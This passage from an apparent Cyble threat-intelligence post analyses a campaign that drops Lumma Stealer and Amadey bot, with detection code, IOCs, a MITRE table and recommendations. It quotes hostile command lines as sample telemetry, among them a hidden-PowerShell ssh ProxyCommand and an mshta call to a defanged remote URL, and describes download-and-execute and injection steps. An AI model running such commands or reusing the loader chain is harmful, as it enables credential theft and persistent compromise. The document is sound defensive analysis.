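    {"pid": 10, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 11, "ppid": 10, "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": 'ssh.exe -o ProxyCommand="powershell -w hidden -nop -c <obfuscated>" localhost'},
    {"pid": 12, "ppid": 11, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -nop -c <obfuscated>"},
    {"pid": 13, "ppid": 12, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP"},
    {"pid": 20, "ppid": 10, "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -p 2222 admin@buildhost"},
    {"pid": 21, "ppid": 10, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent-child rule is the robust one: an attacker can rename or re-encode the ProxyCommand payload, but ssh.exe still has to spawn the interpreter, and that relationship shows up in process-creation telemetry regardless of how the LNK was built. The ordinary `ssh.exe -p 2222 ...` and the explorer-launched backup script produce no alerts.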

Encryption
Figure 3 – AES-encrypted content hosted in AMP URL

Upon decryption, the data reveals Base64-encoded content, which is displayed in the image below.

Figure 4 – Base64-encoded content

The decoded Base64 content reveals an obfuscated PowerShell command, as shown in the image below.

Figure 5 – Obfuscated PowerShell command

This PowerShell command manipulates security protocols and performs the following actions:

  • First, it configures various security protocols, including TLS 1.0, TLS 1.1, TLS 1.2, and SSL 3.0, using the .NET ServicePointManager class.
  • Then, it initiates a web request using Invoke-WebRequest (iwr) to fetch a payload from the URL hxxps://Pastebin[.]com/raw/0v6Vhvpb, which is then immediately executed using Invoke-Expression (iex).

The image below shows the retrieved payload from the Pastebin URL.

Figure 6 – Partial PowerShell script fetched from the Pastebin URL

The retrieved content from the Pastebin link consists of a PowerShell script that performs several actions:

  1. The script begins by sanitizing the content fetched from Pastebin, removing newline characters (“\n”) and commas (“,”).
  2. The cleaned string is then decoded from Base64 into binary data.
  3. Using a hardcoded decryption key, the script decrypts the binary data.
  4. Once decrypted, the script extracts a portion of the data starting from the 64th byte to the end, which is the actual code to execute. This code is then converted into a readable PowerShell command using UTF-8 encoding.
  5. Before executing the decoded command, a 2-second delay is introduced with Start-Sleep. Finally, the decoded PowerShell command is executed in memory using Invoke-Expression.

The image below shows the decrypted PowerShell code extracted using the above steps.

Figure 7 – Decrypted PowerShell code

The newly introduced script represents the final stage in delivering malicious files to the system. The script operates as follows:

  1. The script first verifies the system’s internet connectivity by sending HTTP requests to two distinct domains: 360.net and baidu.com. These requests ensure the system is online before proceeding with further actions.
  2. Once the victim’s system is connected to the internet, the script downloads a malicious CPL file named naailq0.cpl from the remote URL hxxps://berb.fitnessclub-filmfanatics.com/naailq0.cpl.
  3. The downloaded CPL file is saved as a ZIP file within the Temp directory. This ZIP file is then copied to a newly created folder under the LocalAppData folder. The folder name is dynamically generated using a GUID (Globally Unique Identifier).
  4. After extraction, the script scans the folder for any executable files (EXEs). Any EXE files found within the extracted contents are then executed.
  5. The script includes a commented-out line that, if activated, would delete the extracted files and folder after execution, potentially covering its tracks.

The image below shows the contents of the downloaded ZIP file. The ZIP file also contains encrypted files, which will be decrypted and loaded in the subsequent stages of infection.

Figure 8 – Extracted files in the archive

In this case, the script executes “syncagentsrv.exe”, which performs DLL sideloading by loading the malicious “Qt5Network.dll” upon execution. The malicious DLL then reads an encrypted file named “shp” from the same directory, decrypts its contents, and reveals strings such as LoadLibraryA, VirtualProtect, and dbghelp.dll, as shown in the figure below.

Figure 9 – Decrypted content

After decryption, the malicious DLL extracts the string “dbghelp.dll” from the decrypted content and utilizes it to load the DLL via the LoadLibraryA API. The “dbghelp.dll” is a Microsoft Windows library designed for debugging and managing symbol information. After loading the DLL, the malicious code employs the VirtualProtect API to modify the memory region permissions of “dbghelp.dll” to PAGE_EXECUTE_READWRITE, as illustrated below.

Figure 10 – Modifying the permissions of dbghelp.dll

It then overwrites the contents of “dbghelp.dll” with the decrypted data and subsequently modifies the memory protection of the overwritten region to PAGE_EXECUTE_READ, as depicted below.

Figure 11 – Modifying the permissions of dbghelp.dll

After modifying the memory protection, the malicious code begins executing the injected content within “dbghelp.dll”. The injected code then proceeds to read another file named “bwvrwtn”, located in the same directory. The file “bwvrwtn” is an encrypted IDAT file containing multiple encrypted chunks, each prefixed with the string “IDAT”, as illustrated below.

Figure 12 – IDAT marker

The DLL then searches for the string IDAT, takes the four bytes following it, and compares them with C6 A5 79 EA. If they match, the DLL copies all the data following IDAT into memory, decrypts it with an XOR key, and decompresses the result using the RtlDecompressBuffer API, as shown below.
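As an added illustration (neither the malware’s code nor the report’s), this Python triage helper mirrors the IDAT scan described above: it finds IDAT tags followed by C6 A5 79 EA, gathers the data after each marked tag, and XOR-decrypts it. The sample blob, the 4-byte XOR key and the chunk-boundary handling (a body runs to the next IDAT tag, marker bytes excluded) are assumptions, since the report does not give them; the RtlDecompressBuffer step is not reproduced.

```python
from typing import Iterator, Optional, Tuple

MARKER = bytes.fromhex("C6A579EA")   # 4-byte check value named in the analysis
XOR_KEY = b"\x13\x37\xc0\xde"        # assumption: the campaign's real key is not given


def xor_bytes(buf: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (symmetric, so it both encrypts and decrypts)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))


def build_sample() -> bytes:
    """Constructed PNG-like blob: one ordinary IDAT chunk, then two marked ones."""
    plain = b"MZ\x90\x00compressed-payload-stub"
    enc = xor_bytes(plain, XOR_KEY)
    return (b"\x89PNG\r\n\x1a\n"
            + b"\x00\x00\x00\x05IDAT\x01\x02\x03\x04\x05"   # benign image data
            + b"IDAT" + MARKER + enc[:8]                    # first marked chunk
            + b"IDAT" + MARKER + enc[8:])                   # second marked chunk


def marked_chunks(data: bytes) -> Iterator[Tuple[int, int]]:
    """Yield (start, end) of the body after each IDAT tag whose next 4 bytes match MARKER."""
    pos = data.find(b"IDAT")
    while pos != -1:
        nxt = data.find(b"IDAT", pos + 4)          # next tag, or -1 at end of file
        if data[pos + 4:pos + 8] == MARKER:
            yield pos + 8, (len(data) if nxt == -1 else nxt)
        pos = nxt


def extract_payload(data: bytes, key: bytes = XOR_KEY) -> Optional[bytes]:
    """Concatenate the marked chunk bodies and XOR-decrypt them.

    Returns None when no marked chunk is present. The result is still compressed:
    the DLL hands it to RtlDecompressBuffer, which is Windows-only, so that step
    is left to the analyst.
    """
    parts = [data[s:e] for s, e in marked_chunks(data)]
    if not parts:
        return None
    return xor_bytes(b"".join(parts), key)
```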

Figure 13 – Decompressed data

It then loads a legitimate “pla.dll” from the %syswow64% directory using the LoadLibraryW API. After loading, it changes the memory permissions of “pla.dll” to PAGE_EXECUTE_READWRITE, copies the decrypted content into its memory, changes the permissions to PAGE_EXECUTE_READ, and finally executes the injected code in the “pla.dll” as shown below.

Figure 14 – Executing the injected code

The code within “pla.dll” proceeds to inject malicious code into “more.com” and then executes it. The malicious code in “more.com” is responsible for deploying the final payload by injecting it into a newly created process, “msiexec.exe”. The injected payload is Lumma Stealer, which is capable of stealing sensitive information from the victim’s machine. The figure below shows the memory strings of “msiexec.exe” containing Lumma Stealer’s C2 details.

Figure 15 – Msiexec process memory strings

Amadey Bot

The TA behind this campaign also deploys the Amadey bot in the “%temp%” directory, employing the same technique of injecting code into “more.com”. This injected code further injects the final Amadey bot payload into “explorer.exe”. To achieve persistence, the malware creates a Task Scheduler entry named “NodeJS Web Framework”. This task is configured to execute a copy of the Amadey bot stored in the %Appdata% directory, as illustrated below.

Figure 16 – Task Scheduler entry for persistence

The figure below shows the execution flow of Lumma Stealer and Amadey bot.

Figure 17 – Execution flow

Conclusion

This multi-stage cyberattack campaign demonstrates the increasing sophistication and adaptability of threat actors. By leveraging various evasion techniques such as URL shortening and AMP URLs, the attackers successfully bypass traditional security mechanisms.

The use of legitimate system tools like ssh.exe and mshta.exe to execute malicious PowerShell commands further illustrates the complexity of the attack. The final payload, which involves the deployment of both Lumma stealer and Amadey bot, highlights the TA’s intent to steal sensitive information and maintain persistent control over compromised systems.

YARA and Sigma rules to detect this campaign are available for download from the GitHub repository.

Recommendations

  • The initial breach may occur via spam emails. Therefore, it’s advisable to deploy strong email filtering systems to identify and prevent the dissemination of harmful attachments.
  • Exercise caution when handling email attachments or links, particularly those from unknown senders. Verify the sender’s identity, particularly if an email seems suspicious.
  • Disable WebDAV if it is not required for business operations to minimize potential attack vectors.
  • Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files.
  • The campaign abused the legitimate ssh utility; it is therefore advisable to monitor the activity of the ssh utility and restrict its use to a limited set of users.
  • Consider limiting the execution of scripting languages, such as PowerShell and mshta.exe, on user workstations and servers if they are not essential.
  • Implement application whitelisting to ensure only approved and trusted applications and DLLs can be executed on the systems.
  • Monitor AMP links using advanced URL filtering and threat intelligence feeds to detect suspicious activity.
  • Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.

MITRE ATT&CK® Techniques

| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | The LNK file may be delivered through phishing or spam emails. |
| Execution (TA0002) | User Execution: Malicious Link (T1204.001); Command and Scripting Interpreter: PowerShell (T1059.001) | Execution begins when a user executes the LNK file; the LNK file executes PowerShell commands. |
| Defense Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.008) | Uses LNK files with altered icons to disguise them as legitimate files. |
| Defense Evasion (TA0005) | System Binary Proxy Execution: Mshta (T1218.005) | Abuses mshta.exe to proxy execution of malicious files. |
| Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Scripts include packed or encrypted data. |
| Defense Evasion (TA0005) | System Binary Proxy Execution: Msiexec (T1218.007) | msiexec.exe is used for proxy execution of malicious payloads. |
| Privilege Escalation (TA0004) | DLL Side-Loading (T1574.002) | Malicious DLL is side-loaded. |
| Privilege Escalation (TA0004) | Process Injection (T1055) | Injects malicious content into explorer.exe and other processes. |
| Persistence (TA0002) | Scheduled Task/Job (T1053.005) | Adds a Task Scheduler entry for persistence. |
| C&C (TA0011) | Application Layer Protocol (T1071) | Malware communicates with the C&C server. |
| Exfiltration (TA0010) | Automated Exfiltration (T1020) | Data is exfiltrated after collection. |

Indicators Of Compromise

| Indicator | Indicator Type | Description |
|---|---|---|
| 5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 | SHA-256 | Instruction_695-18121-002_Rev.PDF.lnk |
| 8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8 | SHA-256 | Malicious PowerShell script downloaded from Pastebin (0v6Vhvpb) |
| 7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4 | SHA-256 | ZIP file disguised as .cpl |
| dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250 | SHA-256 | Malicious DLL (side-loaded) |
| hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP | URL | Remote server |
| hxxps://pastebin[.]com/raw/0v6Vhvpb | URL | Remote server |
| hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl | URL | Remote server |
| hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/ | URL | WebDAV server link hosting the malicious LNK file |

The post Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot appeared first on Cyble.